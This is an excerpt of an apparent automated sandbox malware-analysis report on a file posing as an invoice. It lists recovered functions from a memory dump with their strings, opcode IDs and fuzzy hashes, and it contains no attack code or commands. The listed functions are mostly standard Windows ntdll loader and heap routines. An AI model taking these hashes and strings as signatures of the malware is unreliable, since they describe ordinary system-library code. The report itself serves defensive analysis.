                                            • Instruction ID: 08db7d06cfdefebd83b46db0fb1eb70ca0d9edf422a1739bd91638d0a49abbe3
                                            • Opcode Fuzzy Hash: 92917d899fa265aee025d4e75790662f9783ca0b0e8cd39ecc60b662058aed37
                                            • Instruction Fuzzy Hash: E671D170A00209DFDB29DFA9C984AEEB7F4FB48704F54406DE992AB315E734AD81CB50
                                            Function 01090A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-1334570610
                                            • Opcode ID: 0f4b811307c86a086b52f43a90840ce3321f80b81499e30cd00d815b22453dfd
                                            • Instruction ID: b0c7426805acf6ea6b68c0baa1414684289f6dd3e1bcc4aca58efa37b7623786
                                            • Opcode Fuzzy Hash: 0f4b811307c86a086b52f43a90840ce3321f80b81499e30cd00d815b22453dfd
                                            • Instruction Fuzzy Hash: D561DF30600301DFDB69CF28C854BAABBE5FF45708F14859AE4D98F28AD774E881CB90
                                            Function 010BC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                            Download Yara Rule
                                            Strings
                                            • minkernel\ntdll\ldrinit.c, xrefs: 010F82E8
                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 010F82DE
                                            • Failed to reallocate the system dirs string !, xrefs: 010F82D7
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1783798831
                                            • Opcode ID: f4765f5a409bd57eebf4ad2eb05be8c93be90930cce86655a1ea78067551067b
                                            • Instruction ID: 7e2c0a8fa6af52a91cec71a4a37f92eeb378a3a2a6a226f82bf13429b0e57f0d
                                            • Opcode Fuzzy Hash: f4765f5a409bd57eebf4ad2eb05be8c93be90930cce86655a1ea78067551067b
                                            • Instruction Fuzzy Hash: AC4102B1544305ABE725EB68D984B9B77F8FF44620F00853AB9D4D7260E770E840CB91
                                            Function 0113C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                            Download Yara Rule
                                            Strings
                                            • PreferredUILanguages, xrefs: 0113C212
                                            • @, xrefs: 0113C1F1
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0113C1C5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                            • API String ID: 0-2968386058
                                            • Opcode ID: 90e2f6a4307ee013a1dd707466bb1975ee66a7051cb8fbeb0c3dcd0206907a59
                                            • Instruction ID: 7ed3cff642500e619548674884fa71a64e6513ad317ceadd8e0c3c71d58677c0
                                            • Opcode Fuzzy Hash: 90e2f6a4307ee013a1dd707466bb1975ee66a7051cb8fbeb0c3dcd0206907a59
                                            • Instruction Fuzzy Hash: CE416372E00219EBDF15DBD8C851FEEBBB9AB94700F14406BEA49F7244D7749A448B90
                                            Function 01114144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                            • API String ID: 0-1373925480
                                            • Opcode ID: ebbb40359bf29711be333766f4dea87bbee75a7005b5ce3c62413f68cf489cde
                                            • Instruction ID: 2311db793bfb4142fe3cb5bb7f6940a0ad1542722bcd070725b8b640904ac47a
                                            • Opcode Fuzzy Hash: ebbb40359bf29711be333766f4dea87bbee75a7005b5ce3c62413f68cf489cde
                                            • Instruction Fuzzy Hash: 9D4126319002588BEB29DBE8D850BEDFBB4FF55B40F240469D941EFB85D7349941CB51
                                            Function 01104755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            Strings
                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01104888
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01104899
                                            • LdrpCheckRedirection, xrefs: 0110488F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-3154609507
                                            • Opcode ID: 1aeafb9705f1fe500ddad34e41707be17513f813cb9f594f26019274b6fde8f7
                                            • Instruction ID: 5a52e15b4a822f0c851c6580f096f4fe4c07f05a4352f335ab0eb125d902d17c
                                            • Opcode Fuzzy Hash: 1aeafb9705f1fe500ddad34e41707be17513f813cb9f594f26019274b6fde8f7
                                            • Instruction Fuzzy Hash: 5A41E732E04A519FDB2BDE9CD480A277BE4AF89650F06056EEF94D7B91D7B0D900CB81
                                            Function 01090BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-2558761708
                                            • Opcode ID: 56267823491266d20b5f77b8502f29cbabc95615d1991a4a999130ed99454fae
                                            • Instruction ID: 580d0cd6fc5397740e9054e2df90196bb934fbd1d7adb282bb317bad14b4f780
                                            • Opcode Fuzzy Hash: 56267823491266d20b5f77b8502f29cbabc95615d1991a4a999130ed99454fae
                                            • Instruction Fuzzy Hash: B011E1713141429FDBA9DA1ACC68BBAB3E8EF40A1DF188569F486CB295DF30D840C754
                                            Function 011020DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpInitializationFailure, xrefs: 011020FA
                                            • Process initialization failed with status 0x%08lx, xrefs: 011020F3
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01102104
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2986994758
                                            • Opcode ID: e36516ee08f0e93e3462f62f6c20fd64ebdeb10beaaaaef3e5fa10fd53afad53
                                            • Instruction ID: 08756b3918a5597afdabc437cc503ef25d3d892972a185f0d81ff81a5bf24c9c
                                            • Opcode Fuzzy Hash: e36516ee08f0e93e3462f62f6c20fd64ebdeb10beaaaaef3e5fa10fd53afad53
                                            • Instruction Fuzzy Hash: A8F0C235A40308AFE729E64CCC46F9A777DFB80B54F54006DFA90BB6C5D2F0A940CA91
                                            Function 010903E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: #%u
                                            • API String ID: 48624451-232158463
                                            • Opcode ID: 958b5510094534fff56b8512c4aaabf2781f3c64e542fb803819e1e05017b94d
                                            • Instruction ID: 9afe3e0313d30227efcf1a6d89d14c72217b6644e03342c6ed4cb346093a38a0
                                            • Opcode Fuzzy Hash: 958b5510094534fff56b8512c4aaabf2781f3c64e542fb803819e1e05017b94d
                                            • Instruction Fuzzy Hash: E57159B1A0014A9FDF05DFA9C994BAEB7F8BF08744F144069E945EB251EB34ED41CBA0
                                            Function 0108A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrResSearchResource Exit, xrefs: 0108AA25
                                            • LdrResSearchResource Enter, xrefs: 0108AA13
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                            • API String ID: 0-4066393604
                                            • Opcode ID: d4d39c9c965ebdff5d24e0f544aee9b5cf076e351eef98511da9d3bfb2ad8b14
                                            • Instruction ID: c4541547bce1f1c44f8a5aada873e08f9ec77caa6bb7f0bb47a517475d063a52
                                            • Opcode Fuzzy Hash: d4d39c9c965ebdff5d24e0f544aee9b5cf076e351eef98511da9d3bfb2ad8b14
                                            • Instruction Fuzzy Hash: 1FE19F71B08219DFEB22DE99C994BAEBBF9BF04310F10446AE9C1EBA51D734D940CB50
                                            Function 0114A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: `$`
                                            • API String ID: 0-197956300
                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                            • Instruction ID: bc5b0cb449afaf569bdd199b49ecc3c1cbf71806bf0d39f183e9430fafe03e4d
                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                            • Instruction Fuzzy Hash: 91C1E4312443429BEB29CF28D841B6BBBE5BFC4B18F094A2DF696CB290D775D505CB81
                                            Function 010FE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Legacy$UEFI
                                            • API String ID: 2994545307-634100481
                                            • Opcode ID: cd9cb6601336b4c282634ab41af3bf3dd4cc68e5becb3548412fed0697432051
                                            • Instruction ID: d77bb77303b75be1540ef3469cca5b711aefa2a73bb99ee9dbe14dabbb94fc76
                                            • Opcode Fuzzy Hash: cd9cb6601336b4c282634ab41af3bf3dd4cc68e5becb3548412fed0697432051
                                            • Instruction Fuzzy Hash: 2F615B71E003099FDB24DFA8C841BAEBBF9FB48700F15406DE689EB6A1D731A901CB50
                                            Function 011243D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$MUI
                                            • API String ID: 0-17815947
                                            • Opcode ID: fbac4ad2301095540eb6ea9e1d81c202bfdc7086792491405fc84e895c4479f5
                                            • Instruction ID: 9a6be4c98b7038fd002ebfac5be9f1890484f8319e7371ab234bcc0f68f3e6a2
                                            • Opcode Fuzzy Hash: fbac4ad2301095540eb6ea9e1d81c202bfdc7086792491405fc84e895c4479f5
                                            • Instruction Fuzzy Hash: AB5128B1E0062EAEDF15DFA9CC90AEEBBB8EB44754F100529E651B7690D7309E05CB60
                                            Function 010804E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                            Download Yara Rule
                                            Strings
                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0108063D
                                            • kLsE, xrefs: 01080540
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                            • API String ID: 0-2547482624
                                            • Opcode ID: f1b59cc8a7f2d8239be7e3831e4e373ad45e6854c6e63175cb5a6d869b84a1ce
                                            • Instruction ID: 6de1f93578c88da1cdb3a5d2323a350c1dafc5974bd77f648e5d2c699d4b2c87
                                            • Opcode Fuzzy Hash: f1b59cc8a7f2d8239be7e3831e4e373ad45e6854c6e63175cb5a6d869b84a1ce
                                            • Instruction Fuzzy Hash: E551AF716087468FD724EF68C4406A7BBE4AF88304F14883EFAE987245E7709549CBA1
                                            Function 0108A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                            Download Yara Rule
                                            Strings
                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0108A309
                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0108A2FB
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                            • API String ID: 0-2876891731
                                            • Opcode ID: 239f871bf3d5ebd001c2b92a3381d16e26e4c2a8816039eda13fce633c9cf5e8
                                            • Instruction ID: 5c60fda5514f1f03659857959585de44759f838d0f1d09ede119d43bf19e4609
                                            • Opcode Fuzzy Hash: 239f871bf3d5ebd001c2b92a3381d16e26e4c2a8816039eda13fce633c9cf5e8
                                            • Instruction Fuzzy Hash: 0341AC31B08659DFDB21AF69C844BAE7BF4BF84300F1480AAE9C0DB691E2B5D940CB40
                                            Function 010BA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Cleanup Group$Threadpool!
                                            • API String ID: 2994545307-4008356553
                                            • Opcode ID: ff5709d9f493348a3d62d1648f0400a579a0a27149da18a802ce68fd3c6871c9
                                            • Instruction ID: c237710e2e26f6dd59c5c8fc83f61aa2f66f377bb4a4022d248b3efc49236d11
                                            • Opcode Fuzzy Hash: ff5709d9f493348a3d62d1648f0400a579a0a27149da18a802ce68fd3c6871c9
                                            • Instruction Fuzzy Hash: 7701D1B2240700EFE311DF14CD85B967BF8E798B15F008939B698CB290E734E904CB46
                                            Function 0108C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: MUI
                                            • API String ID: 0-1339004836
                                            • Opcode ID: 3492b321fdf09443d858909c60ed13d90698de2ea342c1aa32ddd426bfbaca91
                                            • Instruction ID: 554bf24e92704f14297cd6f20eef976463011498c21eca4112d00b9f7cb56b28
                                            • Opcode Fuzzy Hash: 3492b321fdf09443d858909c60ed13d90698de2ea342c1aa32ddd426bfbaca91
                                            • Instruction Fuzzy Hash: 7E825F75E042198BEB64EFA9C9807EDBBB1BF44310F1481A9E9D9AB391DB309D41CF50
                                            Function 01106420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: 47721bcb584c947bc8d59c3e297826bde5dc30d4382bf3538a3d3c4d23a671fc
                                            • Instruction ID: 0f25d0f52534f3dfeec7b4321bbd343796366669cc3fe534351857419f0cbae2
                                            • Opcode Fuzzy Hash: 47721bcb584c947bc8d59c3e297826bde5dc30d4382bf3538a3d3c4d23a671fc
                                            • Instruction Fuzzy Hash: 42915072900219AFEB26DB95CD85FEEBBB8EF18B50F504065F600AB190D775AD10CBA4
                                            Function 0112E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: 6dfbb85c2dd900f5bd2e954010fb49281c20d7109fb44ae5bee3bcc447aa333d
                                            • Instruction ID: 87693b12563fe7fbb74d2a01cab694d647c0cb94b85ebb3a7a66e44fa2e69efa
                                            • Opcode Fuzzy Hash: 6dfbb85c2dd900f5bd2e954010fb49281c20d7109fb44ae5bee3bcc447aa333d
                                            • Instruction Fuzzy Hash: 6A91CC32A02619BEDF2AEBA5DC94FEFBB79EF45740F100029F505A7250EB349911CB91
                                            Function 010BA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: GlobalTags
                                            • API String ID: 0-1106856819
                                            • Opcode ID: c6a56861817605ad923fa24faf242fbb7947b3fbf7581656901d8e3bd270e244
                                            • Instruction ID: c5da1db18ea5e377c5aad880b98143b9da5d74a225d407e31fc80d117d59329d
                                            • Opcode Fuzzy Hash: c6a56861817605ad923fa24faf242fbb7947b3fbf7581656901d8e3bd270e244
                                            • Instruction Fuzzy Hash: E2716CB5E0031A9FDF68CF98C5926EDBBF1BF48700F14816EE685A7641E7329841CB50
                                            Function 01124978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .mui
                                            • API String ID: 0-1199573805
                                            • Opcode ID: 1fc42e4d9d6be976fab0b28865ba0e1df77f2c28b3dc07a15116328827881282
                                            • Instruction ID: 10d3dbdd48fc405bc691ee696425b893840d7c6e438fd65d21ff583688377693
                                            • Opcode Fuzzy Hash: 1fc42e4d9d6be976fab0b28865ba0e1df77f2c28b3dc07a15116328827881282
                                            • Instruction Fuzzy Hash: A251A572D0023A9BDF19DFA9D840BEEBBB4AF18B50F054129E956BB640D7349C11CBE4
                                            Function 0109E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: EXT-
                                            • API String ID: 0-1948896318
                                            • Opcode ID: 41d65b1c9c296d2d47c26dfed9e469833d5336e5b6abdb7cfcd06f8a39cd4633
                                            • Instruction ID: 9ecdd65f2b1b67a9c8e01f91c8ffedf59263ad524397205fe518dd19f880e70a
                                            • Opcode Fuzzy Hash: 41d65b1c9c296d2d47c26dfed9e469833d5336e5b6abdb7cfcd06f8a39cd4633
                                            • Instruction Fuzzy Hash: A641AF72508302ABDB10DA75C894BAFBBE8BF88704F440A6DFAC5D7180E674DD049793
                                            Function 010FC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryHash
                                            • API String ID: 0-2202222882
                                            • Opcode ID: 43695fb4db3b031b940b9ce4d05f622176ec20b8857393f1d3b5be91f3cba7f3
                                            • Instruction ID: c5bcc4c5621ac4de39621956901fa1495b02d63e66f908896bbb747ebb16b465
                                            • Opcode Fuzzy Hash: 43695fb4db3b031b940b9ce4d05f622176ec20b8857393f1d3b5be91f3cba7f3
                                            • Instruction Fuzzy Hash: 074135B1D0062DAAEB21DB50CD86FDEB77CAB54714F0045E9E748AB140DB709E898F94
                                            Function 01116B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #
                                            • API String ID: 0-1885708031
                                            • Opcode ID: 5e4914c64f69d01b74c9322e29621b7a4f42935b8b8648545b9152af01d45396
                                            • Instruction ID: dd8fcef6e58e85c8622dfa77ec9ff68bef2311960f00a4489c3973f5b5925220
                                            • Opcode Fuzzy Hash: 5e4914c64f69d01b74c9322e29621b7a4f42935b8b8648545b9152af01d45396
                                            • Instruction Fuzzy Hash: 62311431B007599AEB2ACB69C850BEEBBB8EF15704F144038E944AB286C7B6D905CB50
                                            Function 010FCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryName
                                            • API String ID: 0-215506332
                                            • Opcode ID: 5a9c67438330546acc77d9bcbbb5d76f0a411b33650e174e2d12634ff15d3f5a
                                            • Instruction ID: 102608710b46b15b5b278d4a84493d5cf6c2f7e8297322e51bf54329c73310c9
                                            • Opcode Fuzzy Hash: 5a9c67438330546acc77d9bcbbb5d76f0a411b33650e174e2d12634ff15d3f5a
                                            • Instruction Fuzzy Hash: DF31353A90050DAFFB16CB59CA53EAFBBB4EB80710F01406DAA41A7650D7309E04DBE0
                                            Function 0110892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            Strings
                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0110895E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                            • API String ID: 0-702105204
                                            • Opcode ID: fd811dc5949cb9a125fbe3975df237e4804db68235ef0dc3645f4c8edac8d077
                                            • Instruction ID: fd49fbd0254765509f98c5fea5b1be4984898ea5a9c414eae0099fff8c0a26ef
                                            • Opcode Fuzzy Hash: fd811dc5949cb9a125fbe3975df237e4804db68235ef0dc3645f4c8edac8d077
                                            • Instruction Fuzzy Hash: 2301F731F18206DBEA2E7A59DC84A5A7F75EFC52A4B05002CF68116292DFB06C84C792
                                            Function 01122000 Relevance: .8, Instructions: 757COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f36d4babfdab5a4deb90a5660ae55748386d9976d2c6c7193267b41477351759
                                            • Instruction ID: 0e1fb0293179bfd50c89f6da554ea48ecc6edd5193cf1ed8552027ec89869f46
                                            • Opcode Fuzzy Hash: f36d4babfdab5a4deb90a5660ae55748386d9976d2c6c7193267b41477351759
                                            • Instruction Fuzzy Hash: E442E3326083618FE72DCF68C890A6FBBE5BF98300F58492DFA8297250D771D955CB52
                                            Function 01118158 Relevance: .6, Instructions: 617COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6107b9a364142a31e135a968ae70749ada1bb048db41056817b0aa8f66b0e0ac
                                            • Instruction ID: 334c04a325211b78a9fd23af0cb9979a37f0557fee8c11f4492a05d76a7fb693
                                            • Opcode Fuzzy Hash: 6107b9a364142a31e135a968ae70749ada1bb048db41056817b0aa8f66b0e0ac
                                            • Instruction Fuzzy Hash: F0423C75E102198FEB29CF69C881BEDFBB5BF48300F19C1A9E949AB245D7349981CF50
                                            Function 01092840 Relevance: .6, Instructions: 605COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 870fa0d02555549581fea04e5eaeae55d7e91f1b1644d75dd0493036c0f0f37f
                                            • Instruction ID: e4c16d15464cb168232a33729097357002e955664ec648f9650fd821f20a3d7c
                                            • Opcode Fuzzy Hash: 870fa0d02555549581fea04e5eaeae55d7e91f1b1644d75dd0493036c0f0f37f
